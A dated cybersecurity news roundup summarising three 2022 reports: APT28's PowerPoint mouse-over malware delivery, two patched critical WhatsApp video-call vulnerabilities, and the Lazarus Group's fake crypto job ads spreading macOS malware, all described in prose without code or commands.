29th September, 2022
Hackers use PowerPoint mouse over trick to deploy malware
APT28, the Russian state-sponsored threat actor has been found leveraging a new code execution method. This method involves a PowerPoint file, the execution is delivered from the victim entering the presentation mode and moving their mouse. Once the victim has moved their mouse, a PowerShell script downloads and executes a dropper from OneDrive. This file is a seemingly harmless image file however it functions as a follow-on payload, the malware is a variant of the Graphite malware which uses Microsoft Graph API and OneDrive for C2 communications. The PowerPoint file has been crafted to target defence and government sectors in Europe, posing as the Organisation for Economic Co-operation and Development (OECD) which is a Paris based government entity.
Critical WhatsApp bugs that can let attackers hack devices
WhatsApp is famous for it’s encrypted messaging service which is used by hundreds of millions of people around the world. However, Meta (parent company) have just released patches for 2 separate critical vulnerabilities. One of them concerns CVE-2022-36934 (CVSS score: 9.8), an integer overflow vulnerability which allows the attacker to execute arbitrary code by establishing a video call. The second bug is similar however it involves an integer underflow vulnerability, meaning that the function expected a larger input that the one provided. Meta has released a patch for Apple and Android, users for Android need to be updated to version 220.127.116.11 or higher and users for Apple need to be updated to 18.104.22.168 or higher. Malwarebytes have stated that the vulnerabilities reside in two components called ‘Video Call Handler’ and ‘Video File Handler’ which can allow the attacker to seize control of the app.
Lazarus Group Targeting Crypto Job Hunters
The North Korean Lazarus Group has in recent months, been sending unsolicited job opportunities for crypto currency-based roles, in order to deliver malware designed for macOS. Cyber security company SentinelOne discovered last week that positions for the crypto exchange firm in Singapore, Crypto[.]com have been used as the attack vector. This latest discovery is an addition to the very similar attempts made in August, found by another cyber security firm, ESET, but crafted the job opportunity to look like it was for Coinbase, another well-known and widely used cryptocurrency exchange. Both of these malware-laden advertisement campaigns come under a larger ongoing rollout of attacks, known as Operation In(ter)caption, or Operation Dream Job. If a user were to click on the advertisement, a decoy PDF is downloaded and opened, while simultaneously deleting the Apple Terminals saved state in the background (‘com.apple.Terminal.savedState’). A second stage is then initiated which runs a copycat of the ‘FinderFontsUpdater.app’ program called ‘WifiAnalyticsServ.app’. This extracts and executes the binaries making up the 3rd stage of the attack, ‘wifianalyticsagent’, which acts as a beacon for the attackers Command and Control Server. Due to the C2 server currently being offline, the final payload is unknown. As phishing attacks get more advanced, its vital to check that all the details seem legitimate before accessing these kinds of ad’s or accidently downloading malicious documents.